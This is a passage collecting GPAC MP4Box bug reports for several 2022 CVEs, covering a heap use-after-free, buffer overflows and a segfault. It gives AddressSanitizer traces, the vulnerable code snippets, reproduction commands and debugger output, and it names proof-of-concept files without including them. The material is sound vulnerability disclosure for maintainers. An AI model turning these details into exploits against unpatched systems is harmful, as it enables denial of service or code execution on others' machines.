        #22 0x55f8720423db in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #23 0x7fa6c7ec3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    previously allocated by thread T0 here:
        #0 0x7fa6cda1ec18 in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:164
        #1 0x7fa6ca0aff20 in realloc_chain utils/list.c:621
        #2 0x7fa6ca0aff20 in gf_list_add utils/list.c:630
        #3 0x7fa6caed0d5f in gf_props_merge_property filter_core/filter_props.c:1199
        #4 0x7fa6cae9661b in gf_filter_pid_new filter_core/filter_pid.c:5258
        #5 0x7fa6cb05adf9 in m2tsdmx_declare_pid filters/dmx_m2ts.c:411
        #6 0x7fa6cb05f98a in m2tsdmx_setup_program filters/dmx_m2ts.c:592
        #7 0x7fa6cb06245b in m2tsdmx_on_event filters/dmx_m2ts.c:876
        #8 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1779
        #9 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1132
        #10 0x7fa6ca9439b6 in gf_m2ts_section_complete media_tools/mpegts.c:624
        #11 0x7fa6ca9452af in gf_m2ts_gather_section media_tools/mpegts.c:755
        #12 0x7fa6ca94a532 in gf_m2ts_process_packet media_tools/mpegts.c:2721
        #13 0x7fa6ca94dd68 in gf_m2ts_process_data media_tools/mpegts.c:2813
        #14 0x7fa6cb05a250 in m2tsdmx_process filters/dmx_m2ts.c:1420
        #15 0x7fa6caf29bcc in gf_filter_process_task filter_core/filter.c:2750
        #16 0x7fa6caee9af3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #17 0x7fa6caef63ee in gf_fs_run filter_core/filter_session.c:2120
        #18 0x7fa6ca938fd1 in gf_media_import media_tools/media_import.c:1551
        #19 0x55f87208daec in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #20 0x55f8720423db in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4508
        #21 0x55f8720423db in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #22 0x7fa6c7ec3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-use-after-free filters/dmx_m2ts.c:470 in m2tsdmx_declare_pid
    Shadow bytes around the buggy address:
      0x0c0e7fff8850: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
      0x0c0e7fff8860: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
      0x0c0e7fff8870: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 00 00
      0x0c0e7fff8880: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
      0x0c0e7fff8890: 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 00 00
    =>0x0c0e7fff88a0: 00 00 00 00 fa fa fa fa fd[fd]fd fd fd fd fd fd
      0x0c0e7fff88b0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff88c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff88d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==583780==ABORTING
    

**POC**

poc\_uaf.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47093: heap-use-after-free filters/dmx_m2ts.c:470 in m2tsdmx_declare_pid · Issue #2344 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b has a Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_pps\_bs\_internal function of media\_tools/av\_parsers.c

while (nb\_ctb\_left >= uni\_size\_ctb) {
	nb\_ctb\_left -= uni\_size\_ctb;
	pps->tile\_rows\_height\_ctb\[pps->num\_tile\_rows\] = uni\_size\_ctb; // when pps->num\_tile\_rows == 32, overflow at pps->tile\_rows\_height\_ctb
	pps->num\_tile\_rows++;
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof2.mp4
    

Crash reported by sanitizer

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [VVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:10985:29: runtime error: index 33 out of bounds for type 'u32 [33]'
    

**POC**

poc\_bof2.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47087: Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c · Issue #2339 · gpac/gpac

GPAC MP4Box v2.1-DEV-rev574-g9d5bb184b contains a segmentation violation via the function gf_sm_load_init_swf at scene_manager/swf_parse.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Forget to check the return value of gf_swf_read_header in gf\_sm\_load\_init\_swf. gf_swf_read_header should fall fast if error is detected.

gf\_swf\_read\_header(read);
load->ctx->scene\_width = FIX2INT(read->width);
load->ctx->scene\_height = FIX2INT(read->height);
load->ctx->is\_pixel\_metrics = 1;

**Verison info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile with

    ./configure --enable-sanitizer
    make
    

run with poc.swf (in attachment)

    ./MP4Box import -add poc.swf
    

crash triggered

    [TXTLoad] Unknown text format for poc.swf
    Failed to connect filter fin PID poc.swf to filter txtin: Feature Not Supported
    Blacklisting txtin as output from fin and retrying connections
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==215517==ERROR: AddressSanitizer: SEGV on unknown address 0x615100000035 (pc 0x7f022cad9afb bp 0x7ffdc954ed70 sp 0x7ffdc954dc40 T0)
    ==215517==The signal is caused by a READ memory access.
        #0 0x7f022cad9afb in gf_sm_load_init_swf scene_manager/swf_parse.c:2667
        #1 0x7f022ca5125f in gf_sm_load_init scene_manager/scene_manager.c:692
        #2 0x7f022d169cea in ctxload_process filters/load_bt_xmt.c:476
        #3 0x7f022cecfbcc in gf_filter_process_task filter_core/filter.c:2750
        #4 0x7f022ce8faf3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #5 0x7f022ce9c3ee in gf_fs_run filter_core/filter_session.c:2120
        #6 0x7f022c8defd1 in gf_media_import media_tools/media_import.c:1551
        #7 0x56297ebccaec in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #8 0x56297eb813db in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4508
        #9 0x56297eb813db in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #10 0x7f0229e69d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #11 0x7f0229e69e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #12 0x56297eb5dcb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV scene_manager/swf_parse.c:2667 in gf_sm_load_init_swf
    ==215517==ABORTING
    

**Gdb**

    Program received signal SIGSEGV, Segmentation fault.
    0x00007f2d4fe54afb in gf_sm_load_init_swf (load=load@entry=0x6110000084f0) at scene_manager/swf_parse.c:2667
    2667		load->ctx->scene_width = FIX2INT(read->width);
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────────────────────────
    *RAX  0x611000008508 —▸ 0x604000002a90 —▸ 0x616000001280 ◂— 0x0
     RBX  0xfffecf4d70a ◂— 0x0
     RCX  0xfffecf4d6ea ◂— 0x0
     RDX  0x0
    *RDI  0x615100000035 ◂— 0x0
     RSI  0x0
    *R8   0x611000008528 ◂— 0xa9
     R9   0x610000000bd0 —▸ 0x200000002 ◂— 0x0
     R10  0x610000000bd4 —▸ 0x20000000002 ◂— 0x0
     R11  0x610000000bd0 —▸ 0x200000002 ◂— 0x0
     R12  0x6110000084f0 ◂— 9 /* '\t' */
    *R13  0x6150fffffffd ◂— 0x0
    *R14  0x615000013e4c —▸ 0xb40000000a9 ◂— 0x0
    *R15  0x611000008508 —▸ 0x604000002a90 —▸ 0x616000001280 ◂— 0x0
    *RBP  0x7fff67a6c940 —▸ 0x7fff67a6ca60 —▸ 0x7fff67a6dd60 —▸ 0x7fff67a6ddf0 —▸ 0x7fff67a6def0 ◂— ...
    *RSP  0x7fff67a6b810 ◂— 0xf4dc4ae
    *RIP  0x7f2d4fe54afb (gf_sm_load_init_swf+747) ◂— cvttss2si ecx, dword ptr [r13 + 0x38]
    ────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────
     ► 0x7f2d4fe54afb <gf_sm_load_init_swf+747>    cvttss2si ecx, dword ptr [r13 + 0x38]
       0x7f2d4fe54b01 <gf_sm_load_init_swf+753>    shr    rax, 3
       0x7f2d4fe54b05 <gf_sm_load_init_swf+757>    cmp    byte ptr [rax + 0x7fff8000], 0
       0x7f2d4fe54b0c <gf_sm_load_init_swf+764>    jne    gf_sm_load_init_swf+2550                <gf_sm_load_init_swf+2550>
     
       0x7f2d4fe54b12 <gf_sm_load_init_swf+770>    mov    rsi, qword ptr [r12 + 0x18]
       0x7f2d4fe54b17 <gf_sm_load_init_swf+775>    test   rsi, rsi
       0x7f2d4fe54b1a <gf_sm_load_init_swf+778>    je     gf_sm_load_init_swf+2570                <gf_sm_load_init_swf+2570>
     
       0x7f2d4fe54b20 <gf_sm_load_init_swf+784>    test   sil, 7
       0x7f2d4fe54b24 <gf_sm_load_init_swf+788>    jne    gf_sm_load_init_swf+2570                <gf_sm_load_init_swf+2570>
     
       0x7f2d4fe54b2a <gf_sm_load_init_swf+794>    lea    rdx, [rsi + 0x18]
       0x7f2d4fe54b2e <gf_sm_load_init_swf+798>    cmp    rsi, -0x18
    ──────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────────────────────────────────────────────────────
    In file: /home/sumuchuan/Desktop/gpac_fuzz/gpac/src/scene_manager/swf_parse.c
       2662         read->flags = load->swf_import_flags;
       2663         read->flat_limit = FLT2FIX(load->swf_flatten_limit);
       2664         load->loader_priv = read;
       2665 
       2666         gf_swf_read_header(read);
     ► 2667         load->ctx->scene_width = FIX2INT(read->width);
       2668         load->ctx->scene_height = FIX2INT(read->height);
       2669         load->ctx->is_pixel_metrics = 1;
       2670 
       2671         if (!(load->swf_import_flags & GF_SM_SWF_SPLIT_TIMELINE) ) {
       2672                 swf_report(read, GF_OK, "ActionScript disabled");
    ──────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────────
    00:0000│ rsp 0x7fff67a6b810 ◂— 0xf4dc4ae
    01:0008│     0x7fff67a6b818 —▸ 0x7fff67a6c910 —▸ 0x7fff67a6c9b0 —▸ 0x60e000667773 ◂— 0x0
    02:0010│     0x7fff67a6b820 —▸ 0x61100000852c —▸ 0x2b000000000 ◂— 0x0
    03:0018│     0x7fff67a6b828 —▸ 0x611000008528 ◂— 0xa9
    04:0020│     0x7fff67a6b830 —▸ 0x7fff67a6b850 ◂— 0x41b58ab3
    05:0028│     0x7fff67a6b838 —▸ 0x611000008530 —▸ 0x6020000002b0 ◂— '/tmp/gpac_cache'
    06:0030│     0x7fff67a6b840 —▸ 0x611000008548 —▸ 0x615000013e00 —▸ 0x6110000084f0 ◂— 9 /* '\t' */
    07:0038│     0x7fff67a6b848 —▸ 0x7fff67a6b850 ◂— 0x41b58ab3
    ────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────────
     ► f 0   0x7f2d4fe54afb gf_sm_load_init_swf+747
       f 1   0x7f2d4fdcc260 gf_sm_load_init+896
       f 2   0x7f2d504e4ceb ctxload_process+2283
       f 3   0x7f2d5024abcd gf_filter_process_task+3181
       f 4   0x7f2d5020aaf4 gf_fs_thread_proc+2244
       f 5   0x7f2d502173ef gf_fs_run+447
       f 6   0x7f2d4fc59fd2 gf_media_import+16210
       f 7   0x565119c9faed import_file+15133
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    
    

**Backtrace**

    pwndbg> bt
    #0  0x00007f2d4fe54afb in gf_sm_load_init_swf (load=load@entry=0x6110000084f0) at scene_manager/swf_parse.c:2667
    #1  0x00007f2d4fdcc260 in gf_sm_load_init (load=load@entry=0x6110000084f0) at scene_manager/scene_manager.c:692
    #2  0x00007f2d504e4ceb in ctxload_process (filter=<optimized out>) at filters/load_bt_xmt.c:476
    #3  0x00007f2d5024abcd in gf_filter_process_task (task=0x607000001520) at filter_core/filter.c:2750
    #4  0x00007f2d5020aaf4 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000000410) at filter_core/filter_session.c:1859
    #5  0x00007f2d502173ef in gf_fs_run (fsess=fsess@entry=0x616000000380) at filter_core/filter_session.c:2120
    #6  0x00007f2d4fc59fd2 in gf_media_import (importer=importer@entry=0x7fff67a6ee20) at media_tools/media_import.c:1551
    #7  0x0000565119c9faed in import_file (dest=<optimized out>, inName=inName@entry=0x7fff67a832c8 "fake.swf", import_flags=0, force_fps=..., frames_per_sample=0, fsess=fsess@entry=0x0, mux_args_if_first_pass=<optimized out>, mux_sid_if_first_pass=<optimized out>, tk_idx=<optimized out>) at fileimport.c:1498
    #8  0x0000565119c543dc in do_add_cat (argv=<optimized out>, argc=<optimized out>) at mp4box.c:4508
    #9  mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6124
    #10 0x00007f2d4d1e4d90 in __libc_start_call_main (main=main@entry=0x565119c30bc0 <main>, argc=argc@entry=4, argv=argv@entry=0x7fff67a82d98) at ../sysdeps/nptl/libc_start_call_main.h:58
    #11 0x00007f2d4d1e4e40 in __libc_start_main_impl (main=0x565119c30bc0 <main>, argc=4, argv=0x7fff67a82d98, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fff67a82d88) at ../csu/libc-start.c:392
    #12 0x0000565119c30cb5 in _start ()
    

**Credit**

xdchase

**POC**

poc-segfault.zip

CVE-2022-47086: missing check in gf_sm_load_init_swf, causing Segmentation fault · Issue #2337 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

buffer overflow in gf\_vvc\_read\_pps\_bs\_internal function of media\_tools/av\_parsers.c

while (nb\_ctb\_left >= uni\_size\_ctb) {
	nb\_ctb\_left -= uni\_size\_ctb;
	pps->tile\_cols\_width\_ctb\[pps->num\_tile\_cols\] = uni\_size\_ctb; // when pps->num\_tile\_cols == 30, overflow at pps->tile\_cols\_width\_ctb
	pps->num\_tile\_cols++;
}

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof3.mp4
    

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [VVC] Warning: Error parsing NAL unit
    [Core] exp-golomb read failed, not enough bits in bitstream !
    media_tools/av_parsers.c:10964:28: runtime error: index 30 out of bounds for type 'u32 [30]'

Tag

#linux